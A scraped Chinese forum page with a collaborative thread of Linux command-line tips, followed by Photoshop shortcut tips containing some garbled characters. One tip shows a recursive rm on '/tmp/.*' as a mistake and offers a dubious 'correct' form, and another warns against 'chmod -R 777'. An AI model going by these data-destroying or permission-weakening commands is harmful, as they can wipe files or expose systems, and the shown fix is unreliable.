首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
   查看所有帖子 (sun)


« 1 2 3 (4) 5 6 7 ... 46 »


linux 操作技巧.(不断增加)
新进会员
注册日期:
1970/1/1 8:00
所属群组:
注册会员
帖子: 5
等级: 1; EXP: 34
HP : 0 / 8
MP : 1 / 1279
离线
-Tip1 查看man文件...
nroff -man man/libnet.3 | less

有时候man文件不在系统目录..这时候就可以用上面的方式来查看非标准的man文件


-Tip2 以不同的用户身份运行程序...
su - username -c "where/is/command/line"

有时候需要运行特殊身份的程序...就可以让su来做...

-Tip3 解压bz文件
tar -jvxf some.bz

就是把tar的zvxf 改成jvxf


-Tip4 编辑/etc/inittab后直接生效的方法..

执行init q

-Tip5 让linux连续执行几个命令,出错停止

command1 && command2 && command3 ....

-Tip6 linux中的bg和fg管理

当我们打ctrl+z的时候一个任务就被挂起(就是暂停),同时屏幕上返回一个数字,
这时候可以用 "bg %数字" 来把这个进程放到后台执行...这个很适合在你忘了加
&的时候进行补救...同样 " fg %数字 "就能让这个进程放到前台来执行了...
job命令用来查看当前的被bg的进程...

-Tip7 ctrl+s与ctrl+q

ctrl-s 好象是从终端时代遗传过来的东东, 流量控制, 用来暂停向终端发送数据的. ctrl-q 用来恢复恢复

-Tip8 目录统计教本

保存成total.sh ,然后用total.sh 绝对路径,就会统计路径下目录的大小了
代码:

#!/bin/sh
du $1 --max-depth=1 | sort -n|awk '{printf "%7.2fM ----> %s\n",$1/1024,$2}'|sed 's:/.*/\([^/]\{1,\}\)$:\1:g'


-Tip9 grep不显示本身进程
代码:

ps -aux|grep httpd|grep -v grep

通过再一次grep -v grep就可以取消显示你所执行的grep本身这个进程,-v参数是不显示所列出的进程名.


-Tip10 自己用的一个统计httpd的脚本
代码:

#!/bin/sh
while (true)
do
pstree |grep "*\[httpd\]$"|sed 's/.*-\([0-9][0-9]*\)\*\[httpd\]$/\1/'
sleep 3
done


-Tip 11 解压rpm包中的文件
代码:

cat gnome-libs-1.4.1.2.90.22.i386.rpm | rpm2cpio | pax -r


-Tip12 去掉apache的manual目录中的所有.en的后缀名

进入到manual目录
代码:

find ./ -regex .*\.en|awk -F. '{ printf "mv %s.%s.%s.%s %s.%s.%s\n",$1,$2,$3,$4,$1,$2,$3}'|sh



-Tip 13 linux里如何映射windows里的硬盘
mount -t smbfs -o username=xxx,password=xxx //winxp_ip_or_hostname/sharename /local_path

fc2中已经不需要-t smbfs这个参数了.

-Tip 14 linux里如何查看可用的硬盘设备
fdisk -l

由 i_amok_cn在 06-30-2004 15:48最后编辑.

_____________________________@

怎样让一滴水不干涸---让他溶入大海

逃避不是解决问题的办法

php+mysql web space selling http://www.be10.com
引用回复
i_amok_cn
查看公开的个人资料
发送一个悄悄话给 i_amok_cn
给 i_amok_cn 发送Email
访问i_amok_cn的主页!
将 i_amok_cn 添加到你的好友名单中
查找 i_amok_cn 的更多帖子
查看 i_amok_cn 发表的精华贴
i_amok_cn

i_amok_cn的头像
VIP

资 料:
注册日期: Mar 2002
帖子: 3,122
精华: 3

2 旧的 05-27-2003, 22:41 默认

i_amok_cn不在线
[zt] form rexhsu's bbshttp://rexhsu.minidns.net/~irc/discuz/viewthread.php?tid=13


Linux Useful Tips (Collected by RexHsu@ccf)

-Tip1 命令行下制作ISO

用法: mkisofs -a -I -J -r -o filename.iso /目录
用途: 将linux下某个目录中的所有文件做成iso镜像.而且我加上了参数,可以保证你做出来的光盘是在windows下也可以用的 (iso是有文件大小限制的...具体多少偶忘记了)

-Tip2 Linux下ISO的虚拟方法

步骤如下:

1. 把 /dev/cdrom 删除,然后运行 ln -s /dev/loop7 /dev/cdrom
2. losetup /dev/loop7 xxx.iso
3. mount /mnt/cdrom

如何换盘:

1. losetup -d /dev/loop7 ;目的是取消这个设备
2. losetup /dev/loop7 yyy.iso ;新的iso文件

-Tip3 hosts的用法

host能够用来查询域名,然而它可以得到更多的信息.host -t mx linux.com可以查询出linux.com的MX记录,以及处理mail的host的名字.host -l linux.com会返回所有注册在linux.com下的域名.host -a linux.com则会显示这个主机的所有域名信息.

-Tip4 *.bz2文件如何解压缩

使用tar -I 或者bunzip2命令都可以.

-Tip5 RPM常见用法

安装rpm包时显示进度并校验包的正确性
用-vh参数:
如 rpm -ivh ipchains-1.3.6-1.i386.rpm
如果用glint或xrpm则不必.

直接通过ftp来安装rpm包
如 rpm -i ftp://ftp.xxx.xxx

校验所有的rpm包,查找丢失的文件
rpm -Va

查找一个文件属于哪个rpm包
如 rpm -qf /usr/bin/who

列出一个rpm包的描述信息
如 rpm -qpi mon-0.37j-1.i386.rpm

列出一个rpm包的文件信息
如 rpm -qpl mon-0.37j-1.i386.rpm

-Tip6 查看系统监听的服务

用法: netstat -ln
解释: "l"表示显示当前系统监听的端口信息;"n"表示端口按照端口号来显示,而不转换为service文件中定义的端口名;若希望了解各个端口都是由哪些进程监听则可以使用p参数.

-Tip7 查看系统运行的进程

用法: ps -auxw
解释: 其中参数"a"表示显示系统中所有用户的的进程;"u"表示输出进程用户所属信息;"x"表示也显示没有控制台的进程;若显示行太长而被截断则可以使用f参数.

-Tip8 Linux帐号搬家

对于新账号->
保证将要加入系统的新帐号放在新的位置上,这通过修改/etc/default/useradd文件中的HOME值来实现. 如: HOME=/home2 使新增帐号的主目录建在/home2下.

将已有帐号移至新的位置->
首先,将已有帐号的主目录连带目录属性拷至新位置,可用下面命令:
cp -a /home /home2

cp -rpd /home /home2
然后,修改/etc/passwd文件中相应记录的home_directory域为/home2/username.

这样两步已将旧帐号移至新位置.确保无误后,可删去旧帐号的旧主目录以腾出原文件系统的空间.

-Tip9
Linux 启动时屏幕显示的信息来不及看清就一闪而过,如果对这些信息感兴趣的话可以在启动完后用命令 dmesg 查看.

-Tip10 GRUB引导恢复小法

用启动盘或安装盘(linux rescue)进linux
sh# grub
grub> root (hdx,y)
grub> setup (hd0)
重启
说明: 如果成功会有一个successful......这里的x,如果是一个盘,就是0.如果你所安装的linux的根分区在第二个硬盘上,那x就是1了;y 就是装有linux系统所在的根分区.setup (hd0)就是把GRUB写到硬盘的MBR上.如果我知道我的linux装在第一个硬盘上,但我不知道装在哪个分区上,就可以先输入root (hd0,然后用[TAB]键来补齐,然后就明白了.

-Tip11 测试磁盘性能

用法: hdparm -tT /dev/hd?
例如: hdparm -tT /dev/hda (测试第一个物理硬盘的速度)

-Tip12 将内网的服务对外开放

将192.168.1.2上的8888端口映射到192.168.1.3的8888端口
#iptables -t nat -A PREROUTING -p tcp -m tcp --dport 8888 -j DNAT --to-destination 192.168.1.2:8888
#iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -d 192.168.1.2 -p tcp -m tcp --dport 8888 -j SNAT --to-source 192.168.1.3
#iptables -A INPUT -p tcp --dport 8888 -i eth0 -j ACCEPT (视情况而加)

-Tip13 关闭"讨厌"的Linux按键Beep声

vi /etc/.inputrc 增加下面一行
set bell-style none

-Tip14 开机进入图形/文本登陆方式

vi /etc/inittab
id:x:initdefault:
x=3:文本方式 x=5:图形方式

-Tip15 在GRUB中限制系统可使用的内存数量

限制Linux只能使用120MB内存

title Red Hat Linux (2.4.19)
root (hd0,1)
kernel /boot/vmlinuz-2.4.19 ro root=/dev/hda2 mem=120M
initrd /boot/initrd-2.4.18-14.img

-Tip16 如何查找某条命令的相关库文件

在Linux环境下通过ldd命令即可实现,在控制台执行:
ldd /bin/ls
即可得到/bin/ls命令的相关库文件列表.

-Tip17 只列子目录(文件)

ls -F | grep /$

你也可以在.bashrc(针对bash)中把该命令作成alias,以后只要敲入sub就可以实现只列子目录的功能.

  alias sub = “ls -F | grep /$”

同样,ls -l | grep ^-则是只列普通文件.

-Tip18 计算目录下的文件及子目录

ls -al | wc -l

-Tip19 RedHat 下显示彩色目录列表

ls -color 可以显示彩色目录列表,其中:

  蓝色→目录
  绿色→可执行文件
  红色→压缩文件
  浅蓝色→链接文件
  灰色→其他文件

同样你还可以试试ls --color(比前面多-),看看两者的差别吧

-Tip20 列目录时显示中文文件名

在没有打补丁的Linux系统中,我们用ls列目录,发现中文文件名都成了?号.我们可以使用--show-control-chars命令选项来显示.

ls --show-control-chars

-Tip21 改变当前路径下所有目录和文件的所有权

chown -R owner[.group] *

也可以用find命令来实现:

  find . -exec chown owner[.group] {} ;

-Tip22 改变所有子目录及文件的属性

在你要改变属性的目录下,输入命令:

chmod -R 777 *

就可以改变下面所有子目录及文件的属性,不过使用这个命令的时候要特别小心,要是在根目录下打入这个命令,你所有文件的属性都将改变,这就会引起很大的安全性问题.

-Tip22 使用nohup命令

如果你想进程在你退出系统后还能执行,可以使用nohup命令.
如:

  nohup tar cf /dev/tape /home &

你退出后再重新登录的话,使用ps命令会发现进程还在执行.

-Tip23 重新启动

Ctrl+Alt+Del 或 init 6 或 shutdown -r now

-Tip24 快速查找文件

查找文件可以用find,但最好是用locate.速度快,参数少.

  locate filename

它是在一个数据库里面查找.所以,要记得经常用updatedb命令更新数据库.一般地,我们是在crontab里面加一句,让机子在每天深夜更新数据库.
另外,快速查找命令文件,可以使用whereis.
例如:

  whereis rpm

-Tip25 查找Linux命令

如果你想实现某种功能,但是不知道该使用什么命令.你可以试试apropos命令,它也许能帮你找到你想要的命令.例如: 你要“查找”文件,又不知道用什么命令,你可以敲入下面的命令:

  apropos search

-Tip26 在同一个命令行上同时执行多条命令

用分号分隔.如编译一个源文件:

  #./configure ; make ; make install

-Tip27 用gzip(gunzip)压缩(解压)同一目录下的多个文件

gzip * 或者 gunzip *

-Tip28 在使用less或more时,直接启动vi

在less或者more中打入v键,会立即启动vi编辑器,可以对文件进行编辑.

-Tip29 在使用mail中启动vi

如果你觉得用mail发送邮件编辑起来很不方便,你可以在正文的顶格输入~v,启动vi进行编辑,编辑完后退出vi,回到mail.

-Tip30 观察文件大小变化

使用watch命令,可以反复执行命令.和ls配合,可以达到观察某文件大小变化的效果.

  watch ls -| file.name

-Tip31 查找含特定字符串的文件

例如查找当前目录下含有"the string you want find..."字符串的文件:


-Tip32 观看binary文件中的字符串

strings binaryfile

-Tip33 重装Win 9x后lilo失效无法启动Linux

只须先用软盘启动Linux然后运行一次lilo即可.对于RedHat可以用命令mkbootdisk来制作启动盘,例如:

  mkbootdisk --device /dev/fd0 2.4.20

其中2.4.20是/lib/modules下的一个目录.

-Tip34 去掉引导区内的lilo信息

安装lilo后如果硬盘数量或分区情况有改变的话将导致硬盘不能启动,这时只需用软盘启动DOS再运行fdisk/mbr即可.

-Tip35 把DOS/Windows改为缺省操作系统

RedHat把Linux作为lilo缺省操作系统,即出现 boot: 提示符后直接回车启动Linux.如果想改为DOS/Windows,修改文件/etc/lilo.conf,把有关启动DOS的部分放在前面,再运行一次lilo即可.也可以在lilo.conf的配置文件前面加上 Default=dos 其中DOS是DOS/Windows的label

-Tip36 如何使用.iso文件

许多Linux发行版本都有.iso的光盘镜像文件,可以用来刻录光盘.我们也可以在Linux系统下直接使用.

  mount -t iso9660 xxxxx.iso /any/path/if/u/like -o loop

-Tip37 显示文件的类型

用命令 file 可以使你知道某个文件究竟是ELF格式的可执行文件,还是shell script文件或是其他的什么格式.

  file filename

-Tip38 解压.tar.gz文件

xxxx.tar.gz文件使用tar带zxvf参数,可以一次解压开.

  tar zxvf xxxx.tar.gz

-Tip39 后台运行程序

可以在程序后面加“&”符号,让程序在后台运行.例如: 你想用updatedb更新文件路径数据库,又不影响你其他的工作.可以:

  updatedb &

-Tip40 强行退出 X

有时候在 X 里由于程序出错鼠标键盘都不起作用,这时候不用着急,因为在Linux下几乎不会像在Win 95里那样恶性死机,你只须同时按下Ctrl+Alt+BackSpace键就可以回到字符界面下了.

-Tip41 压缩可执行文件

可以使用gzexe压缩可执行文件,压缩后的可执行文件仍然可以直接执行.使用本方法可以达到节省磁盘空间的目的(如果你真的需要的话).

  gzexe gawk

-Tip42 处理文件名内含有特殊字符的文件

如果有一个文件名叫-file,如果想删除它,键入 rm -file 会显示invalid option,原来由于文件名的第一个字符为"-",Linux把文件名当做选项了,可以加--解决这个问题,如rm -- -file.如果是其他特殊字符的话可以在特殊字符前加一个\,或者用双引号把整个文件名括起来.

-Tip43 快速进入目录

键入 cd ~ 可进入用户的home目录;键入 cd - 可进入上一个进入的目录.

-Tip44 想全部删除以.开头的file或dir时你会如何干?

Wrong-> rm -r /tmp/.*
Correct-> rm -r /tmp/\.*

-Tip45 修改网卡MAC地址

ifconfig eth0 down
ifconfig eth0 hw ether 00:AA:BB:CCD:EE
ifconfig eth0 up
上面的是临时性的你可以加入rc.local让它开机自动执行

-Tip46 查看网卡工作状态

#mii-tool -v
eth0: no link
product info: vendor 00:00:00, model 0 rev 0
basic mode: autonegotiation enabled
basic status: no link
capabilities: 100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD
advertising: 100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD
SIOCGMIIPHY on 'eth1' failed: Operation not supported


-Tip47 如何解决sendmail和sm-client启动爆慢的问题!

造成sendmail和sm-client启动慢是因为解析的问题,解决方法将自己的主机名加入/etc/hosts中即可,例如我的主机名是linuxbox.localdomain则/etc/hosts中应该有一条
192.168.100.1 linuxbox.localdomain linuxbox
<To Be Continued>

由 i_amok_cn在 08-10-2003 11:46最后编辑.

_____________________________@

怎样让一滴水不干涸---让他溶入大海

逃避不是解决问题的办法

php+mysql web space selling http://www.be10.com
引用回复
i_amok_cn
查看公开的个人资料
发送一个悄悄话给 i_amok_cn
给 i_amok_cn 发送Email
访问i_amok_cn的主页!
将 i_amok_cn 添加到你的好友名单中
查找 i_amok_cn 的更多帖子
查看 i_amok_cn 发表的精华贴
i_amok_cn

i_amok_cn的头像
VIP

资 料:
注册日期: Mar 2002
帖子: 3,122
精华: 3

3 旧的 05-27-2003, 23:03 默认

i_amok_cn不在线
付上一条帖上面信息加蓝色标记的sed语法...

hoho...在unix上处理文字真是帅呆了...

代码:

sed -e "s/^-.*$/[color=blue]&[\/color]/g" tip>./new


_____________________________@

怎样让一滴水不干涸---让他溶入大海

逃避不是解决问题的办法

php+mysql web space selling http://www.be10.com
引用回复
i_amok_cn
查看公开的个人资料
发送一个悄悄话给 i_amok_cn
给 i_amok_cn 发送Email
访问i_amok_cn的主页!
将 i_amok_cn 添加到你的好友名单中
查找 i_amok_cn 的更多帖子
查看 i_amok_cn 发表的精华贴
lucida

lucida的头像
核心会员

资 料:
注册日期: Sep 2001
来自: 梦想开始的地方
帖子: 4,178
精华: 1

4 旧的 05-27-2003, 23:15 默认

使用MSN给 lucida 发送一个信息 lucida不在线
你的计划更新速度如何?

如果快,就置顶。。
如果慢,就直接进精华区。。

_____________________________@

一起见证传说的开始
引用回复
lucida
查看公开的个人资料
发送一个悄悄话给 lucida
将 lucida 添加到你的好友名单中
查找 lucida 的更多帖子
查看 lucida 发表的精华贴
i_amok_cn

i_amok_cn的头像
VIP

资 料:
注册日期: Mar 2002
帖子: 3,122
精华: 3

5 旧的 05-27-2003, 23:19 默认

i_amok_cn不在线
我的目的不是让我一个人来更新...每个人都可以更新....帖个自己的帖子..不断编辑自己的帖子就可以了...:P
建议永久置顶...因为每个人的忘性很大...所以需要有个工具类的帖子来随时查看...

_____________________________@

怎样让一滴水不干涸---让他溶入大海

逃避不是解决问题的办法

php+mysql web space selling http://www.be10.com
引用回复
i_amok_cn
查看公开的个人资料
发送一个悄悄话给 i_amok_cn
给 i_amok_cn 发送Email
访问i_amok_cn的主页!
将 i_amok_cn 添加到你的好友名单中
查找 i_amok_cn 的更多帖子
查看 i_amok_cn 发表的精华贴
lucida

lucida的头像
核心会员

资 料:
注册日期: Sep 2001
来自: 梦想开始的地方
帖子: 4,178
精华: 1

6 旧的 05-27-2003, 23:59 默认

使用MSN给 lucida 发送一个信息 lucida不在线
那就置顶吧

希望大家积极跟贴

一些小要求

1. 不在乎深浅(这个本身也是相对的),只要你认为有用就行
2. 保证命令的正确
3. 格式/编号什么的最好能连贯

感谢/有收获之类的贴子就不要跟了。

谢谢

_____________________________@

一起见证传说的开始
引用回复
lucida
查看公开的个人资料
发送一个悄悄话给 lucida
将 lucida 添加到你的好友名单中
查找 lucida 的更多帖子
查看 lucida 发表的精华贴
henryluo

henryluo的头像
热心会员

资 料:
注册日期: Aug 2002
帖子: 1,224
精华: 0

7 旧的 05-29-2003, 23:22 默认

使用ICQ给 henryluo 发送一个信息 使用MSN给 henryluo 发送一个信息 henryluo不在线
我是个初学者,也把自已的笔记上的加一下吧 (如有错误请PM我,我来改正)
-Tip 将一个服务加到自启动运行等级中
chkconfig --add httpd
chkconfig --level 3 httpd on

就是把httpd加到chkconfig管理中,并加在第三层启动

-Tip 在终端下调音量
aumix

-Tip 将man文件导出为文件并去掉控制符
man command | col -b >col.txt

col -b就是去掉控制符的

-Tip 查看文件夹大小
du ./ --max-depth=1

--max-depth=1是控制显示深度

-Tip 光驱弹出,弹入
eject -r 弹出
eject -t 弹入

-Tip 显示最近登入用户
last

以上命令是redhat8下有用,

2008/12/13 21:57
应用扩展 工具箱


单片机学习网站!!!
新进会员
注册日期:
1970/1/1 8:00
所属群组:
注册会员
帖子: 5
等级: 1; EXP: 34
HP : 0 / 8
MP : 1 / 1279
离线

2008/12/13 21:57
应用扩展 工具箱


Re: 单片机学习网站!!!
新进会员
注册日期:
1970/1/1 8:00
所属群组:
注册会员
帖子: 5
等级: 1; EXP: 34
HP : 0 / 8
MP : 1 / 1279
离线

2008/12/13 21:57
应用扩展 工具箱


Re: 小榕论坛怎么地了?这是谁的地盘儿?
新进会员
注册日期:
1970/1/1 8:00
所属群组:
注册会员
帖子: 5
等级: 1; EXP: 34
HP : 0 / 8
MP : 1 / 1279
离线
小榕那出了点问题,这是大家的地盘 :)

2008/12/13 21:57
应用扩展 工具箱


Re: 露个头
新进会员
注册日期:
1970/1/1 8:00
所属群组:
注册会员
帖子: 5
等级: 1; EXP: 34
HP : 0 / 8
MP : 1 / 1279
离线
这个论坛有个好处就是可以生成pdf文件,并下载.

2008/12/13 21:57
应用扩展 工具箱


Photoshop 鲜为人知的75个技巧
新进会员
注册日期:
1970/1/1 8:00
所属群组:
注册会员
帖子: 5
等级: 1; EXP: 34
HP : 0 / 8
MP : 1 / 1279
离线
Photoshop 鲜为人知的75个技巧

Photoshop之所以在拥有强大功能的同时依然保持了良好的使用性, 很大程度上应该归功于其整齐精练的界面和简单易用的可自定义性( 除了 它大量的工具和命令 )。事实上,Photoshop中拥有大量令人惊异的“隐 藏”功能。无论你用过Photoshop多少年,都会不断发掘出越来越多的东 西。我怀疑会有谁宣称他知道关于Photoshop“所有”的东西( 可能ADOBE 的软件工程师要除外 )。

下面的75个技巧将会帮助你( 无论你是新手还是经验丰富的专家 )掌 握Photoshop的一些“隐藏”功能,以助于更快更有效的完成复杂工作; 或者它们会告诉你一些你以前所不知道的PHTOSHOP的能力!为了您的方便 起见,我们把它们分为八个部分来讲: *界面技巧[↑]

1).你可能知道按Tab键可以隐藏工具箱和浮动面板,同样按Shift+Tab键 可以只隐藏浮动面板( 而保留工具条可见 )。

2).按住Shift键点击浮动面板的标题栏( 最上方的?#123;条 )可以使其吸附 到最近的屏幕边缘。

3).双击浮动面板的上的每一栏( 就是有标题的那个 )可以使其最小化。 通过浮动面板上的最小化按钮可以在紧凑模式( 只有最少的选项和内容可 视 )和正常模式( 显示面板上所有的选项和内容 )之间切换。

4).可以通过按回车键( 或双击工具箱上的工具按钮 )来打开当前工具的 选项面板。不然的话只能通过菜单上的 Window/Show Options 命令来来 打开。

5).利用比例缩放区( 在Photoshop窗体或导航器面板的左下角 )来快速 选择一个准确的显示比例,当输入一个值后按Shift+Enter可允构钸巳?保持在比例缩放区。

6).要改变状态区的显示信息( 在窗口底部,默认显示文件大小,可以通 过Window/Show Status Bar打开 ),按状态区上的按钮从弹出菜单中选 一个新的项目。点击状态区上按钮的左侧区域可以显示当前文件的打印尺 寸、按住Alt点击显示文件尺寸和分辨率、按住Ctrl点击显示拼贴信息。

7).厌倦了灰色的画布底色?选择油漆桶工具[K]( Paint Bucket )按住 Shift点击画布边缘即可设置画布底色为当前的前景色。(注意:要还原 到默认的颜色,设置前景色为25%灰度( R192,G192,B192 )再次按住Shift 点击画布边缘。)

8).在Photoshop中所有的对话框中的取消( Cancel )按钮都可以通过按 住Alt键变为复位( Reset )按钮。这使你可以轻易回复到初始值而毋须取 消重来。

9).键盘上的CapsLock键可以控制光标在精确状态及标准状态之间切换。 注意:如果Photoshop的参数 [Ctrl+K,Ctrl+3] ( File/Preferences/ Display & Cursors... ) 中已经设置光标为精确状态,这时CapsLock键 不起作用。

10).按“F”键可在Photoshop的三种不同屏幕显示方式 ( 标准显示模式→ 带菜单的全屏显示模式→全屏显示模式 )下切换( 或者可以使用工具箱下 端的按钮 )。提示:在全屏模式下按Shift+F可以切换是否显示菜单。 双击Photoshop的背景空白处为打开文件命令[Ctrl+O]( File/Open)。

11).按住Shift点击颜色面板下的颜色条可以改变其所显示的色谱类型。 或者,也可以在颜色条上单击鼠标右键,从弹出的颜色条选项菜单中选取 其它色彩模式。

12).在图片窗口的标题栏上单击鼠标右键可以快速?#123;用一些命令,如画布 大小命令、图像大小命令和复制等等。 在?#123;色板面板上的任一空白( 灰色 )区域单击可在?#123;色板上加进一个 自定义的颜色,按住Ctrl键点击为减去一个颜色,按住Shift点击为替换 一个颜色。

13).通过拷贝粘贴Photoshop拾色器中所显示的16进制颜色值,可以在 Photoshop和其它程序( 其它支持16进制颜色值的程序 )之间交换颜色数据。

*工具技巧[↑]

14).要使用画笔工具画出直线,首先在图片上点击,然后移动鼠标到另一 点上按住Shift再次点击图片,Photoshop就会使用当前的绘图工具在两点 间画一条直线。

15).任何时候按住Ctrl键即可切换为移动工具[V],按住Ctrl+Alt键拖动 鼠标可以复制当前层或选区内容。

16).按住空格键可以在任何时候切换为抓手工具[H]( Hand Tool )。

17).缩放工具的快捷键为“Z”,此外Ctrl+空格键为放大工具,Alt+空 格键为缩小工具。

18).按Ctrl+“+”键以及“-”键分别为放大和缩小图像的视图;相对应 的,按以上热键的同时按住Alt键可以自动?#123;整窗口以满屏显示( Ctrl+Alt+ “+”和Ctrl+Alt+“-” ),这一点十分有用!(注意:如果想要在使用 缩放工具时按图片的大小自动?#123;整窗口,可以在缩放工具的选项中选中“ ?#123;整窗口大小以满屏显示( Resize Windows to Fit )”选项。)

19).用吸管工具选取颜色的时候按住Alt键即可定义当前背景色。

20).结合颜色取样器工具[Shift+I]( Color Sampler Tool )和信息面板 ( Window/Show Info ),我们可以监视当前图片的颜色变化。变化前后 的颜色值显示在信息面板上其取样点编号的旁边。通过信息面板上的弹出 菜单可以定义取样点的色彩模式。要增加新取样点只需在画布上随便什么 地方再点一下( 用颜色取样器工具 ),按住Alt键点击可以除去取样点。 注意:一张图上最多只能放置四个颜色取样点 提示:当Photoshop中有对话框( 例如:色阶命令、曲线命令等等 )弹出 时,要增加新的取样点必须按住Shift键再点击,按住Alt+Shift点击一个 取样点可以减去它。

21).度量工具( Measure Tool )在测量距离上十分便利( 特别是在斜 线上 ),你同样可以用它来量角度( 就像一只量角器 )。首先要保证信息 面板[F8] ( Window/Show Info )可视。选择度量工具点击并拖出一 条直线,按住Alt键从第一条线的节点上再拖出第二条直线,这样两条线 间的夹角和线的长度都显示在

*命令技巧[↑]

22).要再次使用刚用过的滤镜,从菜单中选Filter/Last Filter [Ctrl+F];要用新的选项使用刚用过的滤镜记着多加一个Alt键( Ctrl+Alt+F or Alt + Filter/Last Filter )。 提示:要退去上次用过的滤镜或?#123;整的效果( 或改变合成的模式 ),按 Ctrl+Shift+F ( Filter ? Fade Filter )。

23).如果你最近拷贝了一张图片存在剪贴板里,Photoshop在新建文件[Ctrl+N] ( File/New... )的时候会以剪贴板中图片的尺寸作为新建图的默认大小。 要略过这个特性而使用上一次的设置,在打开的时候按住Alt键[Ctrl+Alt+N] ( Alt + File ?New... )。

24).按Ctrl+Alt+Z和Ctrl+Shift+Z组合键分别为在历史记录中向后和向前 ( 或者可以使用历史面板中的菜单来使用这些命令 )。结合还原[Ctrl+Z] ( Edit/Undo )命令使用这些热键可以自由地在历史记录和当前状态中切 换。

25).Alt+Backspace和Ctrl+Backspace组合键分别为填充前景色和背景色, 另一个非常有用的热键是Shift+Backspace


photoshop八招密技+ photoshop技巧148条

密技一: 当你需要快速隐藏工具栏和多个浮动面板时,逐一点击面板上的关闭按钮,接下来使用时又要打开,十分不方便。其实你可以同时按键盘上的“Shift”和“ Tab”键,这样浮动面板会立即隐藏起来,从屏幕上消失,再同时按下两键,面板又会显现;如果只按下“Tab”键,则工具栏连同浮动面板会一起隐藏,再按以下该键,它们会同时显现。


密技二: 在Photoshop中,有很多时候要修改设置的取值。一般情况会在取值框的又侧有一个黑三角,点击它会出现一个滑动标尺,拖动标尺就可以修改取值了,但有时不会十分精确。这时可以按键盘上的向下箭头键(每按一下表示取值加一)和向上箭头键(每按一下表示取值减一),来准确调整数值。如果按住“Shift”键不放,那么每按一下表示取值加十或减十。


密技三: 当你正在使用画笔工具,要调整不透明度时,还要打开设置框,很麻烦。这时你可以直接按键盘上的数字键来设定。比如当你按一下“ 0”键时,则不透明度为100%。“ 1”键为10%。先按“ 4”再按“ 5”,那么不透明度则为45%,依次类推。


密技四: 当我们要复制文件中的选择对象时,要使用编辑菜单中的复制命令。复制一次你也许觉不出麻烦,但要多次复制,一次一次的点击就相不便了。这时你可以先用选择工具选定对象,而后点击移动工具,在按住“Alt”见不放。当光标变成一黑一白重叠在一起的两个箭头时,拖动鼠标到所需位置即可。若要多次复制,只要重复的放松鼠标就行了。


密技五: 我们需要多层选择时,可以先用选择工具选定文件中的区域,拉制出一个选择虚框;然后按住“Alt”键,当光标变成一个右下角带一小“-”的“+”号时(这表示减少被选择的区域或象素),在第一个框的里面拉出第二个框;而后按住“ Shift”键,当光标变成一个右下角带一小“+”的大“+”号时,再在第二个框的里面拉出第三个选择框,这样二者轮流使用,就可以进行多层选择了。其实用这种方法也可以选择不规则对象,自己去体会吧。


密技六: 当我们编辑图片文件时,有时要去掉选择对象以外的图片颜色,这时可以按键盘上的“Delete”键,选择区以外就会变成背景色或透明的,这要看你设定的背景内容是什么了。


密技七: 去掉扫描图片中的龟纹。由于印刷方面的原因,我们用扫描方式输入电脑的图片会有一些龟纹,如果在此基础上进行处理,会影响以后的效果。这时你可以先用“Noise”滤镜中的“Despeckle”做处理,这时图片会变得稍微模糊;接着用“Sharpen”滤镜中的“Sharpen Edge”(注意设置数值要小一些)再处理一下,就大功告成了,这时即使用放大工具观察也不会出现龟纹了。


密技八: 我们使用Photoshop 一段时间后,文件夹中已经存放了大量的图片和影像文件。当你要调用一个很久不用的文件,并且忘记了它的文件名时,需逐一打开文件夹中的文件来寻找,太麻烦了。我有一简便的方法:Photoshop 的File 菜单下的Automate 中有一个Contact Sheet 命令,它可以给文件夹中的每个文件建立一个小缩图,并存放在一个图象文件中,这样方便了以后的检索和查阅,节省了你我的宝贵时间
工具面板技巧

1. 快速打开文件
双击Photoshop的背景空白处(默认为灰色显示区域)即可打开选择文件的浏览窗口。

2. 随意更换画布颜色
选择油漆桶工具并按住Shift点击画布边缘,即可设置画布底色为当前选择的前景色。如果要还原到默认的颜色,设置前景色为25%灰度(R192,G192,B192)再次按住Shift点击画布边缘。

3. 选择工具的快捷键
可以通过按快捷键来快速选择工具箱中的某一工具,各个工具的字母快捷键如下:
选框-M 移动-V 套索-L 魔棒-W
喷枪-J 画笔-B 铅笔-N 橡皮图章-S
历史记录画笔-Y 橡皮擦-E 模糊-R 减淡-O
钢笔-P 文字-T 度量-U 渐变-G
油漆桶-K 吸管-I 抓手-H 缩放-Z
默认前景和背景色-D 切换前景和背景色-X
编辑模式切换-Q 显示模式切换-F
另外,如果我们按住Alt键后再单击显示的工具图标,或者按住Shift键并重复按字母快捷键则可以循环选择隐藏的工具。

4. 获得精确光标
  按Caps Lock键可以使画笔和磁性工具的光标显示为精确十字线,再按一次可恢复原状。

5. 显示/隐藏控制板
  按Tab键可切换显示或隐藏所有的控制板(包括工具箱),如果按Shift+Tab则工具箱不受影响,只显示或隐藏其他的控制板。

6. 快速恢复默认值
有些不擅长Photoshop的朋友为了调整出满意的效果真是几经周折,结果发现还是原来的默认效果最好,这下傻了眼,后悔不该当初呀!怎么恢复到默认值呀?试着轻轻点按选项栏上的工具图标,然后从上下文菜单中选取“复位工具”或者“复位所有工具”。

7. 自由控制大小
  缩放工具的快捷键为“Z”,此外“Ctrl+空格键”为放大工具,“Alt+空格键”为缩小工具,但是要配合鼠标点击才可以缩放;相同按Ctrl+“+”键以及“-”键分别也可为放大和缩小图像;Ctrl+Alt+“+”和Ctrl+Alt+“-” 可以自动调整窗口以满屏缩放显示,使用此工具你就可以无论图片以多少百份比来显示的情况下都能全屏浏览!如果想要在使用缩放工具时按图片的大小自动调整窗口,可以在缩放工具的属性条中点击“满画布显示”选项。

8. 使用非Hand Tool(手形工具)时,按住空格键后可转换成手形工具,即可移动视窗内图像的可见范围。在手形工具上双击鼠标可以使图像以最适合的窗口大小显示,在缩放工具上双击鼠标可使图像以1:1的比例显示。

9. 在使用Erase Tool(橡皮擦工具)时,按住Alt 键即可将橡皮擦功能切换成恢复到指定的步骤记录状态。

10. 使用Smudge Tool(指尖工具)时,按住Alt键可由纯粹涂抹变成用前景色涂抹。

11. 要移动使用Type Mask Tool(文字蒙版工具)打出的字形选取范围时,可先切换成快速蒙版模式(用快捷键Q切换),然后再进行移动,完成后只要再切换回标准模式即可。

